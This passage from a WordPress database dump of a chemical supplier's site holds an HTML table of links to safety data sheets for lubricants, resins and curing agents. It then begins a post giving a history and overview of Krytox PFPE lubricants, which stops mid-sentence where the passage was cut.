center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/752U.pdf">MS-752U</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143TE.pdf">MS-143 TE</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Linearoil.pdf">LINEAR OIL</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/830.pdf">EPON RESIN 830</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/550.pdf"> MS-550</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/757.pdf">MS-757</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD.pdf">MS-143XD</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/LVP.pdf">LVP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/834.pdf">EPON RESIN 834</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/555.pdf">MS-555</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/762.pdf">MS-762</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD1.pdf">MS-143XD-1</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8990.pdf">NRT 8990</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/862.pdf">EPON RESIN 862</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/560.pdf">MS-560</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/767.pdf">MS-767</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD2.pdf">MS-143XD-2</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8906A.pdf">NRT 8906A</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/872.pdf">EPON RESIN 872</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/580.pdf">MS-580</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/772.pdf">MS-772</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD25.pdf">MS-143XD-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8908.pdf">NRT 8908</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1001F.pdf">EPON RESIN 1001F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/700.pdf">MS-700</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/777.pdf">MS-777</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD5.pdf">MS-143XD-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8950.pdf">NRT 8950</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1002F.pdf">EPON RESIN 1002F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/700.pdf">MS-700M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/782.pdf">MS-782</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/143XD10.pdf">MS-143XD-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT8980.pdf">NRT 8980</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1004F.pdf">EPON RESIN 1004F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720.pdf">MS-720</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/787.pdf">MS-787</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/145W.pdf">MS-145W</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRTgrease.pdf">NRT GREASE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1007F.pdf">EPON RESIN 1007F</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720.pdf">MS-720M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/797.pdf">MS-797</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/145W4.pdf">MS-145W-4</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/PFPEoilsXP.pdf">PFPE OIL W/SOLUBLE ADDITIVE</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1031.pdf">EPON RESIN 1031</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/720L.pdf">MS-720L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/110XB.pdf">MS-110XB</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/153BN.pdf">MS-153BN</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/PFPE-Grease-with-Soluble-Additive.pdf">pfpe-grease-with-soluble-additive</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1050.pdf">EPON RESIN 1050</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/725.pdf">MS-725</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1010.pdf">MS-1010</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/A0305B.pdf">A0305B</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/10X.pdf">PFPE Oils</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1163.pdf">EPON RESIN 1163</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/725.pdf">MS-725M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/2010.pdf">MS-2010</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1206A.pdf">K1206A</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/TS4.pdf">TS4 SEALANT</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8021.pdf">EPON RESIN 8021</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3100MD.pdf">MS-31XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/Y0717A.pdf">Y0717A</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPF.pdf">VACUUM PUMP FLUID</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8132.pdf">EPON RESIN 8132</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730.pdf">MS-730M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3200MD.pdf">MS-32XXMD</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NRT960.pdf">Vydax NRT 960</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VPFXP.pdf">VACUUM PUMP FLUID XP</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8280.pdf">EPON RESIN 8280</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/730L.pdf">MS-730L</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XP35.pdf">X-P35</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA5.pdf">RA/IPA-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHT500AF.pdf">XHT-500AF</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/8281.pdf">EPON RESIN 8281</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805B.pdf">H0805B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA15.pdf">RA/IPA-15</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHToils.pdf">XHT-OILS</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58005.pdf">EPON RESIN 58005</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/738.pdf">MS-738M</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H1112B.pdf">H1112B</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RAIPA.pdf">DryFilm RA/IPA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTAC.pdf">XHT-AC, ACX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/58034.pdf">EPON RESIN 58034</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/745.pdf">MS-745</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSDG.pdf">Vertrel SDG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/RA.pdf">DryFilm RA</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/XHT-BD-series.pdf">XHT BD, BDZ, BDX</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/1510.pdf">EPONEX 1510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/VertrelSFR.pdf">Vertrel SFR</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-RED-16.pdf">MS-143TE Red</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/XHTS.pdf">XHT-S, SX, SZ</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/WD510.pdf">EPI-REZ WD-510</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/750.pdf">MS-750M</a></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/485G-16.pdf">MS-48G RFI Nickel</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-1.0-16.pdf">MS-143TE-1.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/GPL2E.pdf">GPL 2E SERIES</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3522W60.pdf">EPI-REZ 3522-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.0-16.pdf">MS-143TE-2.0</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/fluoroguard.pdf">PCA,PRO,SG</a></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5003W55.pdf">EPI-REZ 5003-W-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755.pdf">MS-755M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-2.5-16.pdf">MS-143TE-2.5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5520W60.pdf">EPI-REZ 5520-W-60</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/755L.pdf">MS-755L</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-5-16.pdf">MS-143TE-5</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/5522WY55.pdf">EPI-REZ 5522-WY-55</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-10-16.pdf">MS-143TE-10</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3015.pdf">EPIKURE 3015</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/760.pdf">MS-760M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-82-16.pdf">ReleaSys 82</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3046.pdf">EPIKURE 3046</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/765.pdf">MS-765</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-85-16.pdf">ReleaSys 85</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3055.pdf">EPIKURE 3055</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-88-16.pdf">ReleaSys 88</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3115.pdf">EPIKURE 3115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/770.pdf">MS-770M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-89-16.pdf">ReleaSys 89</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3125.pdf">EPIKURE 3125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8200-16.pdf">ReleaSys 8200</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3140.pdf">EPIKURE 3140</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/775.pdf">MS-775M</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8500-16.pdf">ReleaSys 8500</a></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3155.pdf">EPIKURE 3155</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8800-16.pdf">ReleaSys 8800</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3164.pdf">EPIKURE 3164</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/780.pdf">MS-780M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/ReleaSys-8900-16.pdf">ReleaSys 8900</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3223.pdf">EPIKURE 3223</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122AVL-16.pdf">MS-122AVL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3234.pdf">EPIKURE 3234</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/795.pdf">MS-795M</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/122SEL-16.pdf">MS-122SEL</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3245.pdf">EPIKURE 3245</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/110XN-16.pdf">MS-110XN</a></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/143TE-BLUE-16.pdf">MS-143TE Blue</a></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3253.pdf">EPIKURE 3253</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120X.pdf">MS-120X</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3270.pdf">EPIKURE 3270</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/120XXP.pdf">MS-120X-XP</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3271.pdf">EPIKURE 3271</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/H0805A.pdf">H0805A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3274.pdf">EPIKURE 3274</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/J0912A.pdf">J0912A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3282.pdf">EPIKURE 3282</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K0725A.pdf">K0725A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3290.pdf">EPIKURE 3290</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K1016A.pdf">K1016A</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/3295.pdf">EPIKURE 3295</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/530N-16.pdf">MS-530N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/W.pdf">CURING AGENT W</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/532N-16.pdf">MS-532N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K54.pdf">ANCAMINE K54</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/538N-16.pdf">MS-538N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/K61B.pdf">ANCAMINE K61B</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/539N-16.pdf">MS-539N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BDMA.pdf">BDMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/550N-16.pdf">MS-550N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/BF3400.PDF">BF3-400</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/552N-16.pdf">MS-552N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/DEAPA.pdf">DEAPA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/580N-16.pdf">MS-580N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/NMA.pdf">NMA</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/09/582N-16.pdf">MS-582N</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V115.pdf">VERSAMID 115</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"> <a href="https://www.miller-stephenson.com/wp-content/uploads/2016/12/747-16.pdf">MS-747</a></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V125.pdf">VERSAMID 125</a></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"></td>\r\n<td style="text-align: center;"><a href="https://www.miller-stephenson.com/wp-content/uploads/sds/V140.pdf">VERSAMID 140</a></td>\r\n</tr>\r\n</tbody>\r\n</table>', 'SDS', '', 'inherit', 'closed', 'closed', '', '1842-revision-v1', '', '', '2016-12-22 20:57:11', '2016-12-22 20:57:11', '', 1842, 'https://www.miller-stephenson.com/1842-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3349, 2, '2016-12-22 21:00:38', '2016-12-22 21:00:38', '<h3 style="text-align: center;">[share title=""]</h3>\r\n<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all 